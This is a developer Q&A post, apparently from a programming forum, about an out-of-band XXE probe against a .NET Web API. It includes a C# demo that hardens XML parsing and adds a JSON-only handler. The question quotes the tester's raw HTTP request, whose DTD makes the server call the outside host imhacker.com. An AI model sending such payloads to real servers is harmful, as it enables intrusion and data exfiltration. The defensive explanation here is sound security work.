We had a test conducted in our company to find out potential security vulnerabilities. We have a .NET Web API solution and only json is supported in our requests. The test conducted was as follows: A post request was made on an api endpoint with an xml in the body. The xml had a url pointing to the hackers server. Something like this
POST <url> HTTP/1.1
Content-Type: text/xml
Accept: */*
Cache-Control: no-cache
Host: <hostname>
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 128

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "https://imhacker.com/XXE" >
%one;
]>
The api did give a response: {"Message" : "The request entity's media type 'text/xml' is not supported for this resource."}
However, the tester who was monitoring traffic on the server imhacker did see the request https://imhacker.com/XXE come through. So I have 2 questions:
- How did this request execute despite the response saying that XML is not supported?
- What is the solution? I have seen some recommendations that say: prohibit or ignore DTD processing. How do I apply this to all endpoints in the Web API?
Also, I have seen some people recommending to remove the XmlFormatter, but my code already does a Clear on all formatters and re-adds a customized JSON formatter only.
In .NET 4.5.2 and newer XXE processing is disabled by default. If you are using a lower target framework version, you should upgrade. Otherwise this means that some code which sits before Web API in the pipeline reads the request and explicitly enables XXE. You can try to add a function breakpoint to System.Xml.XmlUrlResolver.GetEntity and send that request to see where exactly this happens.
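As an added illustration (not code from the question or the answer above), the following C# program reproduces the two sides of the issue: the DOCTYPE from the tester's payload is parsed once with DTD processing enabled and a URL resolver attached, and once with DtdProcessing.Prohibit and XmlResolver = null, which is the setting to apply wherever the application creates an XmlReader or XmlDocument. Instead of a real XmlUrlResolver it uses a hypothetical RecordingResolver subclass that records the URI passed to GetEntity and returns an empty stream, so it runs offline and stands in for the function breakpoint the answer suggests. The JsonOnlyHandler at the end is likewise an assumed name; it rejects any request body that is not application/json before the Web API formatters see it.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Http;
using System.Threading;
using System.Threading.Tasks;
using System.Web.Http;
using System.Xml;

// Stand-in for XmlUrlResolver that records every external entity the parser
// asks for instead of fetching it. A breakpoint on XmlUrlResolver.GetEntity
// gives you the same information in a running application.
sealed class RecordingResolver : XmlUrlResolver
{
    public readonly List<string> Requested = new List<string>();

    public override object GetEntity(Uri absoluteUri, string role, Type ofObjectToReturn)
    {
        Requested.Add(absoluteUri.ToString());
        return new MemoryStream(new byte[0]); // empty entity body; no network access
    }
}

// Rejects non-JSON bodies before any Web API formatter reads them. Note that a
// message handler runs inside Web API's pipeline; code that reads the request
// earlier (an HttpModule, Global.asax) is not covered by it.
sealed class JsonOnlyHandler : DelegatingHandler
{
    protected override async Task<HttpResponseMessage> SendAsync(
        HttpRequestMessage request, CancellationToken cancellationToken)
    {
        string mediaType = request.Content?.Headers.ContentType?.MediaType;
        bool hasBody = request.Content != null &&
                       (request.Content.Headers.ContentLength ?? 0) > 0;
        if (hasBody && !string.Equals(mediaType, "application/json",
                                      StringComparison.OrdinalIgnoreCase))
        {
            return request.CreateResponse(HttpStatusCode.UnsupportedMediaType,
                new { Message = "Only application/json request bodies are accepted." });
        }
        return await base.SendAsync(request, cancellationToken);
    }
    // Registration in WebApiConfig.Register:
    //   config.MessageHandlers.Add(new JsonOnlyHandler());
}

static class XxeDemo
{
    // The tester's payload from the question, with a root element appended so
    // the document is well formed once the DTD has been processed.
    const string Payload =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
        "<!DOCTYPE test [\n" +
        "<!ENTITY % one SYSTEM \"https://imhacker.com/XXE\" >\n" +
        "%one;\n" +
        "]>\n" +
        "<test/>";

    // Vulnerable configuration: DTD parsed, external entities resolved.
    static IList<string> ParseWithDtdEnabled(string xml)
    {
        var resolver = new RecordingResolver();
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,
            XmlResolver = resolver
        };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            while (reader.Read()) { }
        }
        return resolver.Requested;
    }

    // Hardened configuration: any DOCTYPE is a fatal XmlException and no
    // resolver exists to fetch anything even if DTDs were ever re-enabled.
    static void ParseHardened(string xml)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        using (var reader = XmlReader.Create(new StringReader(xml), settings))
        {
            while (reader.Read()) { }
        }
    }

    static void Main()
    {
        foreach (string uri in ParseWithDtdEnabled(Payload))
            Console.WriteLine("DTD enabled: parser requested " + uri);

        try
        {
            ParseHardened(Payload);
            Console.WriteLine("Hardened: parsed without error (unexpected)");
        }
        catch (XmlException ex)
        {
            Console.WriteLine("Hardened: rejected DOCTYPE: " + ex.Message);
        }
    }
}
```

The first run prints the https://imhacker.com/XXE URI, which is exactly the out-of-band request the tester observed; the second throws at the DOCTYPE and never consults a resolver. If the application also uses XmlDocument or XmlTextReader, set XmlResolver = null on those instances (and, for XmlTextReader, DtdProcessing.Prohibit) so the same policy holds there.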